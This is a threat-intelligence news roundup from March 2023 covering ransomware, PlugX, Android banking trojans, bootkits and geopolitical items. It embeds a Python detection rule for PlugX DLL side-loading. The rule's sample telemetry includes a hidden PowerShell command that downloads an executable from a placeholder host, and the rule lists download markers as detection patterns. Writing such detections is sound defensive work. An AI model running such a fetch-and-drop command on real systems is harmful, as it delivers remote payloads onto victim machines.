Friday, March 10, 2023 // (IG): BB // Cyber-Roundup // Coffee for Bob
China is developing a quantum communications satellite network
Analyst Comments: China's plan to develop a quantum communication network using LEO and MEO/GEO satellites is a significant development in the field of quantum communication. The Chinese have already demonstrated their prowess in the field with the Mozi mission, which made breakthroughs in quantum mechanics. Quantum communication is a strategic emerging industry in China, with the government aiming to achieve breakthroughs by 2030. A global, all-day quantum communication network would have significant tactical and strategic implications for the Chinese military and government: it would enable secure communication for critical infrastructure and government agencies, enhancing national security.
FROM THE MEDIA: Chinese research institutes are working on a quantum communication network using low Earth orbit (LEO) and medium-to-high Earth orbit (MEO/GEO) satellites. The network aims to provide encryption and secure transmission of information using quantum mechanics. Pan Jianwei, a scientist with the Chinese Academy of Sciences (CAS), revealed the plan at China’s annual political sessions in Beijing on 4 March 2023. The Chinese plan builds on breakthroughs made by the country's 2016 Quantum Science Satellite (Mozi/Micius) mission, which carried out experiments in quantum key distribution, quantum entanglement distribution, and quantum teleportation.
READ THE STORY: SN
New Image Is Our First Look at SpaceX's 'Mini' Starlink in Orbit
Analyst Comments: The accidental photograph of the Starlink V2 Mini satellite provides insight into the new look of the miniature satellites and the changes made to increase broadband capacity. SpaceX is hoping that the V2 Minis will temporarily fill the gap for the increasing demand on its Starlink network until the full-sized version of its next-generation satellites can be launched. The Starlink V2 Minis are part of SpaceX's broader plan to provide high-speed internet connectivity to remote and underserved areas around the world. The accidental photograph shows that the company is making progress in achieving its goals and improving its technology. The satellite imaging company HEO Robotics' ability to capture and identify satellites in orbit is also significant as it allows for better monitoring and tracking of space objects.
FROM THE MEDIA: A newly deployed Starlink V2 Mini satellite was accidentally photographed by a satellite imaging company. HEO Robotics, based in Australia, captured an image of the satellite in low Earth orbit, revealing the new look of the miniature satellites, which SpaceX is hoping will increase the broadband capacity of its internet constellation. The image shows the satellite has two solar panels, which is a noticeable difference from the first-generation Starlink satellites, which have only one.
READ THE STORY: Gizmodo
In-orbit visibility is more important than ever with the influx of Chinese balloons and UFOs
Analyst Comments: Ensuring a safe, sustainable space environment requires a better understanding of the nature of space traffic and the development of satellite autonomy. The lack of visibility puts the United States at risk of falling behind on the space insight curve, and the low public awareness of what’s at stake exacerbates the issue. The US must take urgent action to improve space domain awareness by deploying in-space camera sensors and in-space object tracking.
FROM THE MEDIA: The US is facing growing concerns over space domain awareness as China continues to launch satellites into an orbital environment that the US has little visibility of. The US Government Accountability Office (GAO) predicts that 58,000 satellites will be launched by 2030, in addition to the 5,500 active satellites currently in orbit. Furthermore, some 20 percent of those space assets are expected to launch from China, a country that has made no secret of its space ambitions.
READ THE STORY: The Hill
Canadian military: Ransomware attack on contractor didn’t touch defense systems
Analyst Comments: The ransomware attack on Black & McDonald, a major engineering firm with contracts with the Canadian government and military, did not affect the Department of National Defence’s systems or files, nor its operations or security. This indicates that the Department of National Defence had sufficient security measures in place to prevent the attack from spreading to its systems. However, the attack on a key contractor for the Department of National Defence underscores the ongoing threat of ransomware attacks on critical infrastructure and highlights the need for continued vigilance and investment in cybersecurity measures to protect against such attacks.
FROM THE MEDIA: Canada’s defense department confirmed that its systems were not affected by a ransomware attack on Black & McDonald, a Canadian engineering firm that holds several contracts with the Department of National Defence. The spokesperson for the Department of National Defence said that Black & McDonald is the parent company of Canadian Base Operators and has contracts for facilities management and logistical support services. The spokesperson added that there is no evidence of any effects on DCC systems or files, nor on DND/CAF operations or security, as a result of the incident. Email communication later resumed between the Department of National Defence and the contractor once the company was able to restore its email system. Black & McDonald also has contracts with the Toronto Transit Commission and Ontario Power Generation. The engineering firm has 5,500 employees across 35 offices in North America and reported sales of $1.5 billion last year.
READ THE STORY: The Record
Nation-state hackers using malicious USB drives in attacks in Africa, Asia, and Oceania
Analyst Comments: The use of USB drives laden with PlugX malware by hackers targeting government organizations across multiple countries underscores the ongoing threat of advanced persistent threat (APT) groups using sophisticated techniques to steal sensitive information. The use of USB drives for malware distribution is not a new technique, but it has proven to be highly effective in this part of the world, and APT groups have re-adopted it as an effective infection and exfiltration method. The use of the PlugX malware and USB delivery method, commonly used by the Chinese government, further underscores the ongoing threat of state-sponsored cyber espionage. Organizations should remain vigilant and implement security measures to protect against such attacks, including educating employees on the risks of using unknown USB drives and implementing policies to restrict the use of USB drives.
FROM THE MEDIA: Hackers are using USB drives laden with PlugX malware, typically used by the Chinese government, to target people in Mongolia, Papua New Guinea, Ghana, Zimbabwe, and Nigeria. The PlugX malware is a malicious tool developed in 2008 by Chinese government hackers commonly known as Mustang Panda. Sophos researchers found that government organizations across Southeast Asia were being targeted with USB drives in November 2022. By December 2022, the attack had spread to Africa. The malware and USB delivery method are partially meant to steal information from air-gapped networks. The researchers saw “localized outbreaks” of a new variant of PlugX being spread through the USB drives in Mongolia, Zimbabwe, and Nigeria. The PlugX malware copies everything in a victim’s recycle bin as well as anything on the device’s hard drive. Mustang Panda has previously been accused of targeting prime ministers and leaders across Southeast Asia and Indonesia’s intelligence agency, and even the Russian government.
READ THE STORY: The Record
Xenomorph Android Banking Trojan Returns with a New and More Powerful Variant
Analyst Comments: Xenomorph 3rd generation's emergence in the wild is a significant development in the realm of Android banking trojans. The malware's new features, such as its ability to automate the entire fraud chain, make it one of the most advanced and dangerous Android banking trojans in circulation. Its ability to target more than 400 banking and financial institutions, including cryptocurrency wallets, poses a significant risk to financial systems worldwide. The malware's distribution via Discord's Content Delivery Network and its use of an APK binding service called Zombinder make it more difficult to detect and mitigate. The emergence of Xenomorph 3rd generation highlights the need for enhanced security measures to protect against banking trojans and the importance of ongoing efforts to combat their spread.
FROM THE MEDIA: A new variant of the Android banking trojan, named Xenomorph, has emerged in the wild. The updated version, known as Xenomorph 3rd generation, comes with new features that allow it to perform financial fraud in a seamless manner. Xenomorph first emerged in February 2022, targeting 56 European banks through dropper apps on the Google Play Store. The latest version, designed to target more than 400 banking and financial institutions, including cryptocurrency wallets, is being distributed via Discord's Content Delivery Network. The malware is delivered via trojanized versions of legitimate apps using an APK binding service called Zombinder. Xenomorph is known to abuse Accessibility Services to perform fraud through overlay attacks and also incorporates an Automated Transfer System module that allows it to extract authenticator codes. The malware also boasts cookie-stealing functions that enable the threat actors to perform account takeover attacks.
READ THE STORY: THN
Iranian Hackers Target Women Involved in Human Rights and Middle East Politics
Analyst Comments: The continued activities of Cobalt Illusion highlight the persistence of state-sponsored hacking groups and their tactics in targeting academics, activists, diplomats, journalists, politicians, and researchers. The group's use of fake personas and credential harvesting to gain access to sensitive data, particularly in the field of political affairs and human rights, is concerning. The bespoke tools that the group uses to steal data from popular email accounts pose a significant risk to privacy and security. The persistence of such groups in targeting individuals of strategic interest to governments highlights the importance of maintaining vigilance and implementing strong cybersecurity measures to protect against phishing attacks and data theft.
FROM THE MEDIA: Iranian state-sponsored hackers, known as Cobalt Illusion, are engaging in social engineering campaigns targeting women researchers involved in political affairs and human rights in the Middle East. They are using fake personas, including a fraudulent employee of a U.S. think tank, the Atlantic Council, to establish contact with individuals of strategic interest to the government. The group is suspected to be operating on behalf of Iran's Islamic Revolutionary Guard Corps and has used credential harvesting to gain control of victims' mailboxes, as well as bespoke tools like HYPERSCRAPE and a Telegram "grabber" tool, to steal data from Gmail, Yahoo!, and Microsoft Outlook accounts. Cobalt Illusion uses phishing and bulk data collection as core tactics and is likely to blend the intelligence gathered with other sources to inform Iran's military and security operations, both foreign and domestic.
READ THE STORY: THN
Russian hackers spreading anti-Western propaganda through video calls
Analyst Comments: The TA499 campaign is a significant tactical threat that aims to discredit those who have spoken out against Russia's invasion of Ukraine or have otherwise supported military actions against Russia. It is a prime example of the perpetuation of disinformation and the impact it can have on individuals and society as a whole. While the use of deepfake videos is a relatively new tactic in disinformation campaigns, it highlights the need for individuals to be vigilant and seek out reliable sources of information. In a broader strategic sense, disinformation campaigns like TA499 can undermine public trust in institutions and sow division, making them a threat to national security.
FROM THE MEDIA: A pro-Russia propaganda campaign targeting C-level executives and high-level officials has been uncovered by cybersecurity company Proofpoint. The threat actor behind the campaign, dubbed TA499 or Vovan, attempts to get high-profile individuals on a video or audio call by impersonating Ukrainian Prime Minister Denys Shmyhal and others. The hackers then use excessive makeup or artificial intelligence to create convincing deepfake videos of the impersonated individual to trick the target into making embarrassing comments or acts, which are then edited and placed on YouTube and Twitter. The campaign is a serious threat that has already tricked high-level officials and executives and could damage the brand and public perception of those targeted.
READ THE STORY: GVS
PyPI repo poisoned with “Colour-Blind” RAT
Analyst Comments: The discovery of Colour-Blind highlights the ongoing risks and challenges that organizations face in terms of software supply chain security. Organizations should be careful when using open-source software packages and conduct security assessments before adopting them. The increase in supply chain attacks is driven by the potentially high-value data at stake, such as the secrets exposed in the recent CircleCI hack, and the automation of attacks is even more concerning, as attackers can publish malware in an automated way.
FROM THE MEDIA: The rise of software supply chain risks is indicated by the ease with which hackers can write the basic functions of malware into modern languages like Python. Colour-Blind is a sign of the increased threat landscape that arises from the democratization of cybercrime, and multiple malware variants can be spawned from code sourced from others. Cybercriminals are using crime-as-a-service offerings on the dark web, simplifying the requirements to become a threat actor. Threat actors are always on the lookout for new attack vectors, vulnerabilities, and techniques to achieve their goals.
READ THE STORY: Security Boulevard
EU plans joint navy patrols to combat Russian threat to infrastructure
Analyst Comments: The Nord Stream pipeline attack highlighted the need for increased monitoring and protection of critical maritime infrastructure and ships from physical and cyber threats. The move also emphasizes the need for better coordination between member states and increased satellite monitoring and intelligence sharing. Floating gas storage and regasification units (FSRUs) are considered a possible target; they are vital to Europe's plans to end its dependency on Russian gas by tapping the global market for seaborne LNG imports. The task forces will also clean up the Black Sea after the Ukraine war, where mines planted by both Ukraine and Russia have drifted toward EU member states. Mines and unexploded shells on the seabed from the two world wars also need to be mapped and removed to make way for renewable energy plans.
FROM THE MEDIA: The EU is planning joint maritime patrols and naval exercises to combat Russian spy ships and protect critical marine infrastructure. The updated maritime strategy, set to be published on Friday, includes an action plan for an annual joint EU naval exercise, increased military and coastguard patrols, and better coordination between member states. The strategy also advocates for increased satellite monitoring and intelligence sharing. The move comes as EU member states warn of mounting evidence of Russian activity around offshore wind farms, oil and gas drilling platforms, and telecommunications cables. The strategy warns that floating gas storage and regasification units (FSRUs) are possible targets, which are vital to Europe’s plans to end its dependency on Russian gas by tapping the global market for seaborne LNG imports. The terminals are considered vulnerable structures that Moscow could try to damage.
READ THE STORY: FT
IceFire Ransomware Exploits IBM Aspera Faspex to Attack Linux-Powered Enterprise Networks
Analyst Comments: IceFire ransomware group's shift to Linux systems represents a significant move, as Linux systems are generally considered more secure than Windows systems. However, the exploitation of a recently disclosed vulnerability in IBM Aspera Faspex file-sharing software has given the group an entry point. The attacks have primarily targeted media and entertainment organizations in countries that are not typically targeted by ransomware groups. Linux systems are less vulnerable to typical infection vectors like phishing or drive-by downloads, but the exploitation of application vulnerabilities can overcome this. As ransomware attacks continue to evolve and diversify, organizations need to keep their systems updated and regularly monitor for vulnerabilities.
FROM THE MEDIA: IceFire, previously a Windows-based ransomware, has started targeting Linux enterprise networks of media and entertainment sector organizations around the world. The attacks exploit a recently discovered deserialization vulnerability in IBM Aspera Faspex file-sharing software, and the ransomware is capable of avoiding encrypting certain paths to keep the infected machine operational. SentinelOne, a cybersecurity company, has observed a majority of attacks directed at companies located in Turkey, Iran, Pakistan, and the U.A.E. Linux systems are generally more difficult to deploy ransomware against than Windows, particularly at scale. Linux servers are less vulnerable to typical infection vectors like phishing or drive-by downloads, but ransomware actors can overcome this by exploiting application vulnerabilities. In another development, Fortinet FortiGuard Labs has disclosed a new LockBit ransomware campaign that employs evasive tradecraft to avoid detection. The campaign uses .IMG containers that bypass Mark-of-the-Web (MotW) protections.
READ THE STORY: THN
Hackers Exploiting Remote Desktop Software Flaws to Deploy PlugX Malware
Analyst Comments: The use of remote desktop software vulnerabilities to deploy malware like PlugX is a growing concern for organizations worldwide. The exploitation of such vulnerabilities has been proven to be effective in infecting victims and gaining control over their systems without their knowledge. The continued use of PlugX by Chinese threat actors with added features for system control and information theft shows the significance of this type of malware in cyber operations. The use of the DLL side-loading technique highlights the importance of protecting against DLL hijacking attacks. Organizations should prioritize securing their remote desktop software and implementing robust security measures to prevent the exploitation of vulnerabilities by threat actors.
FROM THE MEDIA: Security vulnerabilities in remote desktop programs such as Sunlogin and AweSun are being exploited by threat actors to deploy the PlugX malware. AhnLab Security Emergency Response Center (ASEC) reported that this is a continued abuse of flaws to deliver payloads on compromised systems. The PlugX malware is being used by Chinese threat actors, who add new features to help perform system control and information theft. Successful exploitation of the vulnerabilities allows the execution of a PowerShell command that retrieves an executable and a DLL file from a remote server. The DLL side-loading technique is then used to load the DLL file and ultimately run the PlugX payload in memory. The PlugX malware can start arbitrary services, download and execute files from an external source, and drop plugins that can harvest data and propagate using Remote Desktop Protocol (RDP).
READ THE STORY: THN
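The infection chain described above (remote desktop tool spawns PowerShell, PowerShell fetches an EXE and a DLL, the EXE is run and side-loads the DLL from the same directory) can be expressed as a sequence rule over endpoint telemetry. The following is an added detection example, not code from the story or from ASEC; the log lines are constructed Sysmon-style JSON events, the process names in REMOTE_TOOL_IMAGES are assumptions, and the download host is a placeholder.

```python
"""Sequence detection: remote desktop tool -> PowerShell download -> dropped
EXE + DLL -> DLL side-loading. Constructed example; events below are invented."""
import json
import ntpath
from collections import defaultdict

# ASSUMPTION: executable names of the remote desktop products named in the story.
REMOTE_TOOL_IMAGES = {"sunloginclient.exe", "awesun.exe"}
# PowerShell download primitives a fetch-and-drop command line would contain.
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest", "iwr ", "curl ")
# A DLL loaded from these directories is the OS copy, not a side-loaded one.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Constructed sample telemetry, one JSON object per line (paths are assumptions).
SAMPLE_LOG = r"""
{"event": "ProcessCreate", "pid": 5200, "ppid": 4120, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Program Files\\SunLogin\\SunloginClient.exe", "command_line": "powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/u.exe','C:\\Users\\Public\\stage\\update.exe')"}
{"event": "FileCreate", "pid": 5200, "target_file": "C:\\Users\\Public\\stage\\update.exe"}
{"event": "FileCreate", "pid": 5200, "target_file": "C:\\Users\\Public\\stage\\helper.dll"}
{"event": "ProcessCreate", "pid": 6100, "ppid": 5200, "image": "C:\\Users\\Public\\stage\\update.exe", "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "update.exe"}
{"event": "ImageLoad", "pid": 6100, "image": "C:\\Users\\Public\\stage\\update.exe", "loaded_image": "C:\\Windows\\System32\\kernel32.dll"}
{"event": "ImageLoad", "pid": 6100, "image": "C:\\Users\\Public\\stage\\update.exe", "loaded_image": "C:\\Users\\Public\\stage\\helper.dll"}
{"event": "ProcessCreate", "pid": 7000, "ppid": 2000, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "powershell Get-Process"}
"""


def parse_events(text):
    """Parse JSON-lines telemetry into a list of dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path):
    return ntpath.basename(path).lower()


def dirname(path):
    return ntpath.dirname(path).lower()


def detect_sideload_chain(events):
    """Return one finding per PowerShell-dropped EXE that loads a DLL dropped
    alongside it, where that PowerShell was spawned by a remote desktop tool."""
    findings = []
    # Stage 1: PowerShell spawned by a remote desktop tool with a download in its command line.
    staging = {}
    for ev in events:
        if ev["event"] != "ProcessCreate" or basename(ev["image"]) != "powershell.exe":
            continue
        if basename(ev["parent_image"]) not in REMOTE_TOOL_IMAGES:
            continue
        if any(m in ev["command_line"].lower() for m in DOWNLOAD_MARKERS):
            staging[ev["pid"]] = ev
    if not staging:
        return findings
    # Stage 2: EXE/DLL files written by that PowerShell process, grouped by directory.
    dropped = defaultdict(lambda: {"exe": set(), "dll": set()})
    for ev in events:
        if ev["event"] == "FileCreate" and ev["pid"] in staging:
            path = ev["target_file"].lower()
            ext = ntpath.splitext(path)[1]
            if ext in (".exe", ".dll"):
                dropped[(ev["pid"], dirname(path))][ext[1:]].add(path)
    # Stage 3: the dropped EXE is launched by that PowerShell process ...
    exe_pids = {}
    for ev in events:
        if ev["event"] == "ProcessCreate" and ev["ppid"] in staging:
            key = (ev["ppid"], dirname(ev["image"]))
            if ev["image"].lower() in dropped.get(key, {}).get("exe", set()):
                exe_pids[ev["pid"]] = (ev["ppid"], ev["image"])
    # ... and loads the dropped DLL from its own directory rather than an OS directory.
    for ev in events:
        if ev["event"] != "ImageLoad" or ev["pid"] not in exe_pids:
            continue
        ps_pid, exe = exe_pids[ev["pid"]]
        dll = ev["loaded_image"].lower()
        if dll.startswith(TRUSTED_DIRS) or dirname(dll) != dirname(exe):
            continue
        if dll in dropped[(ps_pid, dirname(dll))]["dll"]:
            findings.append({
                "rule": "remote-desktop-tool -> powershell download -> dll side-load",
                "remote_tool": basename(staging[ps_pid]["parent_image"]),
                "powershell_pid": ps_pid,
                "exe": exe,
                "dll": ev["loaded_image"],
            })
    return findings


def scan(text):
    return detect_sideload_chain(parse_events(text))


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

A real deployment would key the three stages on a process GUID rather than a reusable PID and would restrict the rule to user-writable staging directories.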
North Korean UNC2970 Hackers Expand Operations with New Malware Families
Analyst Comments: Reports surfacing about undocumented malware used by UNC2970 highlight the continued development and deployment of new tools by North Korean cyber-espionage groups. UNC2970's targeting of security researchers suggests a shift in strategy or an expansion of its operations. The group's use of sophisticated obfuscation methods throughout the delivery and execution chain underscores the importance of implementing robust security measures to detect and prevent such attacks. Organizations should be wary of phishing attempts, particularly those involving fake LinkedIn accounts, and prioritize securing their systems against BYOVD techniques. UNC2970's continued cyber-espionage activities demonstrate the strategic significance of cyberspace in the global security landscape.
FROM THE MEDIA: A North Korean cyber-espionage group, UNC2970, has been observed using previously undocumented malware in a spear-phishing campaign targeting media and technology organizations in the US and Europe since June 2022. UNC2970, previously known as UNC577, shares "multiple overlaps" with a long-running operation known as "Dream Job," which uses job recruitment lures in email messages to trigger the infection sequence. UNC2970 uses fake LinkedIn accounts and conversations shifted to WhatsApp to deliver phishing payloads. The group also leverages Microsoft Intune to drop a bespoke PowerShell script containing a Base64-encoded payload. The group's new malware includes LIDSHIFT, LIDSHOT, TOUCHSHIFT, TOUCHSHOT, TOUCHKEY, HOOKSHOT, TOUCHMOVE, and SIDESHOW. UNC2970 uses the Bring Your Own Vulnerable Driver (BYOVD) technique, employing an in-memory-only dropper called LIGHTSHIFT to distribute another piece of malware, LIGHTSHOW, that disarms security software on the infected host.
READ THE STORY: THN
Sneaky malware BlackLotus can bypass important Windows boot functions
Analyst Comments: BlackLotus is a new and powerful bootkit malware that can bypass the UEFI Secure Boot feature in Microsoft Windows, allowing hackers to disable OS security mechanisms and install additional malware. This malware poses a serious threat to Windows users, as it is capable of disrupting networks and stealing sensitive data. The fact that BlackLotus can bypass a security feature that is supposed to protect Windows users highlights the need for continued vigilance and prompt patching of vulnerabilities. This incident also underscores the importance of using additional security measures, such as antivirus software and firewalls, to protect against malware attacks.
FROM THE MEDIA: Cybersecurity researchers are warning about a new malware called "BlackLotus" that is designed to bypass the UEFI Secure Boot feature in Microsoft Windows. BlackLotus exploits a Windows vulnerability that Microsoft patched a year ago, but researchers say the malware can still get around that update. Once BlackLotus has persistence in the boot process, it can disable OS security mechanisms, allowing hackers to install additional malware to surveil or disrupt a network. While an attacker would already need some sort of administrative access for BlackLotus to succeed on a patched computer, the malware's users probably have other goals. Researchers believe that not many threat actors have started using BlackLotus yet, as they have found only a low number of samples in public sources and their telemetry.
READ THE STORY: The Record
China-Russia cybersecurity ties taking darker turns. India needs to worry too
Analyst Comments: China's increasing dominance over Moscow's information control apparatus, which is the backbone of the Kremlin's statecraft, has significant implications for India and the world. While Russia's fall under China's control may have repercussions for a new world order, the deepening China-Russia alliance, despite unprecedented sanctions from the West, is a testament to the gravity of Beijing's dominance. As China continues to expand its digital authoritarianism, other countries may face challenges in maintaining secure communication and transactions with Russia, which could potentially lead to further security risks. China's contrasting approach to global hegemony, which relies on advanced technology and surveillance rather than military interventions, has already set it on a path to compete with the US for global dominance.
FROM THE MEDIA: The China-Russia alliance goes beyond just rerouted energy flows and infrastructural capabilities, as the Chinese Communist Party (CCP) has cemented its reach into Moscow's information control apparatus. Beijing's dominance over Moscow can be seen in its execution of surveillance, digital authoritarianism, and espionage through the most sophisticated system of surveillance, which is integral to the CCP's economic statecraft. This has significant implications for sensitive communication and transactions with Russia, raising concerns about Chinese spying. China's contrastingly successful and unethical use of technology is an essential part of its "no-limits" friendship with Russia, making it a significant threat to the existing world order. As Russia continues to face unprecedented sanctions from the West, it may fall deeper into China's hands, leading to a new world order with significant consequences.
READ THE STORY: The Print
With Russian Support, Nicaragua Smothers Dissent
Analyst Comments: The crackdown on Nicaraguan civil society poses a significant threat to democracy, the free press, and human rights. The decoupling of Nicaragua from the West, and the country's alignment with Russia and China, is a worrying development that may have implications for regional stability. The erosion of civil liberties, censorship of the press, and a crackdown on NGOs and political dissidents undermine democratic institutions and pose a risk to human rights. Furthermore, Russia's and China's increasing influence in Nicaragua may have implications for regional stability, especially if the country revives construction of the long-delayed Nicaraguan Canal across the Central American isthmus, a possible Panama Canal rival proposed by Ortega in 2013.
FROM THE MEDIA: The Nicaraguan government, led by President Daniel Ortega, has been cracking down on the political opposition, free press, and civil society by stripping 94 prominent Nicaraguans of their citizenship and expelling 222 political prisoners. The government has also shut down more than 3,100 non-government organizations (NGOs) involved in providing health, education, and community assistance, including those advocating for clean drinking water and women's rights. The country's civil society is being targeted through restrictions and surveillance of digital communications, with government-led efforts underway to curb access, limit content, and restrict the sharing of critical information. Nicaragua has a growing relationship with Russia, which has supplied the country with military equipment and satellite monitoring infrastructure, while China is also expanding its influence in the country, notably in digital surveillance. These developments have worried the United States that Russia and China, along with military operatives from Cuba, Bolivia, and Venezuela, are expanding their surveillance in the region.
READ THE STORY: FP
Chinese President Xi Jinping seals unprecedented third term
Analyst Comments: Xi's third term comes at a time of rising tensions with the West over issues such as Taiwan, the war in Ukraine, and espionage claims. The move to stack his inner circle with loyalists and strengthen the Communist Party's grip over state institutions is unprecedented in the reform era. As the parliament wraps up on Monday, a new premier and cabinet are set to be confirmed. The announcement of an economic growth target of "around 5%" for the year follows a 3% expansion in 2022, one of China's slowest growth rates since the 1970s, due to strict COVID-19 controls and the hit on the property market and exports.
FROM THE MEDIA: Chinese President Xi Jinping has been formally appointed for an unprecedented third term by thousands of delegates at the National People's Congress (NPC) in Beijing. All 2,952 delegates cast a ballot in favor of Xi's appointment as president and head of the military for another five years. The NPC had previously abolished term limits under Xi's watch, clearing the way for him to potentially rule for life and overtake China's founding fathers Mao and Deng Xiaoping, who was China's de facto ruler for two decades until his death in 1997.
READ THE STORY: Nikkei Asia
Pentagon aims to lure cyber talent through remote work and training
Analyst Comments: The Pentagon's cyber workforce strategy reflects the increasing importance of cybersecurity in national security and the government's ongoing struggle to attract and retain cyber talent. The federal government's cybersecurity workforce shortage has been a persistent problem, and the Pentagon's high vacancy rate underscores the urgency of finding solutions. The strategy's emphasis on creating a cyber-minded workplace culture, offering more flexibility, and identifying untapped sources of talent suggests a willingness to innovate and adapt to compete with Silicon Valley. However, the success of the strategy will depend on the effectiveness of its implementation, and its impact may take several years to become evident.
FROM THE MEDIA: The Department of Defense has released a new cyber workforce strategy aimed at competing with Silicon Valley for civilian cyber talent. The strategy includes plans for training programs, recruitment process changes, and apprenticeship programs to be implemented between 2023 and 2027. The federal government, including the Pentagon, has struggled to compete with private-sector cybersecurity roles that offer higher salaries and more workplace flexibility. The Pentagon's cyber workforce currently has a 25% vacancy rate across military and civilian roles. The new strategy focuses on identifying necessary skills, recruiting more talent, developing a cyber-minded workplace culture, and retaining existing talent. To achieve these goals, the Defense Department plans to create a new talent management system, assess the need for additional training and skillsets, and identify untapped sources of talent. The department also wants to establish a development fund for employee training and provide remote work flexibility for cyber workers. An apprenticeship program for workplace exchanges with the private sector is also planned. The Pentagon plans to release an implementation plan soon, but officials acknowledge that not all ideas will come to fruition.
READ THE STORY: AXIOS
Religious leaders experiment with ChatGPT sermons
Analyst Comments: ChatGPT may be able to help religious leaders save time on routine tasks, such as explaining particular holidays, and focus on more meaningful spiritual counseling. However, in a strategic sense, ChatGPT cannot replace the human warmth and empathy that is necessary for personal connection and spiritual guidance. While the use of AI in religion may trigger a resurgence in mystic religiosity, religious leaders should offer guidance and moral suasion to ensure that AI tools are imbued with ethics and morality.
FROM THE MEDIA: The article discusses how religious leaders are using AI tools, specifically ChatGPT, to help with sermon writing. ChatGPT has been able to pull together relevant thoughts from religious texts and eminent theologians, as well as stirring and poignant turns of phrase. However, religious leaders note that ChatGPT lacks the human warmth and empathy that congregants crave. While ChatGPT can alleviate some of the routine or repetitive tasks for religious leaders, it cannot replace the personal touch provided by spiritual counseling. Nevertheless, ChatGPT is forcing religious leaders to evolve and offer guidance and moral suasion to the tech industry.
READ THE STORY: AXIOS
Cranes, planes, and espionage: China and the US are right to be paranoid
Analyst Comments: The U.S. has ample funding to invest in new technologies and weapons, but it has chosen to prioritize misguided initiatives like maintaining a global military presence of 750 military bases and 170,000 troops stationed overseas, and a $2 trillion plan for building a new generation of nuclear weapons. Furthermore, many of the Pentagon's new favorites, from hypersonics to autonomous weapons to artificial intelligence, are unlikely to perform as advertised and could even make matters worse by increasing the risk of false alarms or inadvertent attacks on the wrong targets. Instead, the U.S. should prioritize diplomacy and dialogue with China to establish short-term guardrails and ongoing channels of communication to lower tensions and avoid conflict.
FROM THE MEDIA: U.S.-China relations have reached a dangerous level of tension, with Chinese President Xi Jinping stating that Western countries, led by the United States, have implemented containment, encirclement, and suppression of China. Meanwhile, the newly formed House Select Committee on the Strategic Competition Between the United States and the Chinese Communist Party has added fuel to the fire by raising concerns about alleged threats posed by Beijing, which, according to some, could lead to needless nuclear war.
READ THE STORY: Reaction
Serial hacker selling US House and Senate members' personal data
Analyst Comments: The data breach at DC Health Link highlights the growing threat of cyber attacks on healthcare and insurance organisations, which hold vast amounts of sensitive personal information. The exposure of data belonging to US House and Senate members is particularly concerning, because it shows how exposed government officials are through the third parties that hold their personal data. The same threat actor surfacing in several unrelated breaches also shows how quickly stolen data is aggregated and resold, and why organisations should treat safeguarding customer data as a proactive obligation rather than a post-breach response.
FROM THE MEDIA: DC Health Link, the District of Columbia's health insurance exchange, experienced a security breach resulting in the exposure of 170,000 client records, including those of US House and Senate members. The stolen dataset, which included sensitive information, was listed for sale on a hacker forum by a threat actor known as "thekilob" or "IntelBroker". The breach was confirmed by House Chief Administrative Officer Catherine Szpindor, who informed affected politicians via email and urged them to freeze their credit to prevent identity theft. The breach's full extent remains unknown, but the FBI is assisting in compiling a list of affected individuals. The same threat actor has previously been linked to data breaches at Weee!, UScellular, and T-Mobile, with data from those breaches also posted on the same hacker forum.
READ THE STORY: Cybernews
Police seize Netwire RAT malware infrastructure, arrest admin
Analyst Comments: The arrest of the suspected administrator of the NetWire remote access trojan and the seizure of the service's web domain and hosting server is a significant development in the fight against cybercrime. Taking NetWire off the market removes a popular, cheap tool used to hijack computers and perpetrate global fraud, data breaches, and network intrusions by threat groups and cyber criminals. Defenders should note, however, that seizing the sales and licensing infrastructure does not disable NetWire builds already deployed on victim machines; existing infections keep running and still warrant detection and removal. The international law enforcement operation shows the effectiveness of global partnerships in combating cybercrime.
FROM THE MEDIA: On March 3rd, a coordinated international law enforcement operation involving the FBI, the United States Attorney's Office for the Central District of California, the Croatia Ministry of the Interior Criminal Police Directorate, Zurich Cantonal Police, Europol, and the Australian Federal Police resulted in the seizure of the NetWire remote access trojan's web domain and hosting server. NetWire was marketed as a legitimate remote administration tool for managing Windows computers. However, since at least 2014, it has been a tool of choice in various malicious activities, including phishing attacks, BEC campaigns, and breaches of corporate networks. The FBI seized the worldwiredlabs.com domain used to promote the service, and police in Switzerland seized the server hosting the website. A Croatian national suspected of being the administrator of the NetWire website was also arrested on Tuesday in Croatia and will be prosecuted by local authorities.
READ THE STORY: BleepingComputer // The Register // TC
Items of interest
Russia avoiding direct military conflict with US, NATO forces?
Analyst Comments: The Annual Threat Assessment report assesses that Russia is unlikely to seek direct military conflict with the West, but it stresses the persistent risk of escalation from Russia's war of aggression against Ukraine. It also notes Russia's continued use of military, security, malign influence, cyber, and intelligence tools to advance its interests. The report's warning that Moscow plans to strengthen ties with American media and politics for future influence operations is a significant concern. Russia's use of food and energy as foreign policy tools is also troubling, as it exacerbates global food shortages and price increases. The report highlights the need for continued vigilance against Russian aggression and influence operations.
FROM THE MEDIA: The US intel community's Annual Threat Assessment report states that while Russia is unlikely to seek direct military conflict with the US and NATO, the potential for escalation in the conflict with Ukraine remains significant. Russia's war of aggression against Ukraine is reshaping its relationships with the West and China, with uncertain consequences. Russian military failures in the war could damage Putin's domestic standing, leading to further escalation in an attempt to regain public support. Russia will likely continue to use military, security, malign influence, cyber, and intelligence tools to advance its interests and undermine those of the US and its allies. The report notes that Moscow plans to "strengthen ties" with American media and politics for "future influence operations."
READ THE STORY: Eastern Eye
The SolarWinds Hack And The Future Of Cyber Espionage (Video)
